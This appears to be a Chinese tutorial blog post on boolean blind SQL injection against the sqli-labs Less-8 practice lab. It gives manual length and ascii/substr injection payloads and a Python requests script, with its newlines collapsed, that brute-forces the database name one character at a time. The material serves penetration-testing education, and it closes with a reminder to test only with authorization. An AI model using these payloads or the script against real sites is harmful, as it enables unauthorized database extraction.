SQL盲注
sql盲注无法使用sql语句注入,需要大量的判断语句或者延时注入。这样手动注入方式比较慢,手动发现注入点后可以使用python编写脚本注入。
手动注入
测试环境
测试环境sql-libs less8中的布尔注入
手动注入语句
?id=1' and length((select database()))=8--+
/?id=1%27%20and%20ascii(substr((select%20database()),1,1))=115--+
不正确时页面显示内容
正确时页面显示内容
就可以遍历访问url,然后匹配响应包中的内容是否包含You are in等特殊字段。
python脚本自动化注入
需求使用python脚本自动化注入,使用python脚本跑出测试环境中的数据库名称。
分解需求,
首先测试网站是否可以正常访问
其次遍历测试数据库的长度
最后遍历测试数据库名称
测试能否正常访问
url = "http://test.com/Less-8/"
# 按实践的地址
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ''(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
# 发送get请求
response = requests.get(url_template,headers = headers)
# 查看请求状态是否为200
print(response)
遍历测试数据库长度
def GetDBName():# 获取数据库的长度print("----------测试数据库长度--------------")url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"for i in range(1, 99):current_url = url_template.format(i)response = requests.get(current_url, headers=headers)if re.search(r'You are in',response.text):len = iprint("数据库长度为:", i)break
遍历测试数据库名称
def GetDBName():# 获取数据库的长度print("----------测试数据库长度--------------")url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"for i in range(1, 99):current_url = url_template.format(i)response = requests.get(current_url, headers=headers)if re.search(r'You are in',response.text):len = iprint("数据库长度为:", i)break# 测试数据库名称print("----------测试数据库名--------------")DBname = ''url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"for i in range(1, len+1):for j in range(33, 127):# 拼接构造需要的测试的URL地址,通过format函数批量构造current_url1 = url_template1.format(i, j)
# print(current_url1)# 发送请求response1 = requests.get(current_url1, headers=headers)# 判断是否成功if re.search(r'You are in', response1.text):DBname += chr(j)print("数据库名为:", DBname)break
效果图
跑出数据库名称即可,测试点到为止。
完整代码
# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 ''(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)def GetDBName():# 获取数据库的长度print("----------测试数据库长度--------------")url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"for i in range(1, 99):current_url = url_template.format(i)response = requests.get(current_url, headers=headers)if re.search(r'You are in',response.text):len = iprint("数据库长度为:", i)break# 测试数据库名称print("----------测试数据库名--------------")DBname = ''url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"for i in range(1, len+1):for j in range(33, 127):# 拼接构造需要的测试的URL地址,通过format函数批量构造current_url1 = url_template1.format(i, j)
# print(current_url1)# 发送请求response1 = requests.get(current_url1, headers=headers)# 判断是否成功if re.search(r'You are in', response1.text):DBname += chr(j)print("数据库名为:", DBname)breakif __name__ == '__main__':GetDBName()说明
PS:请授权后再测试,禁止未授权进行渗透测试。使用代码默认是接受授权测试。请按照当地法规进行测试。
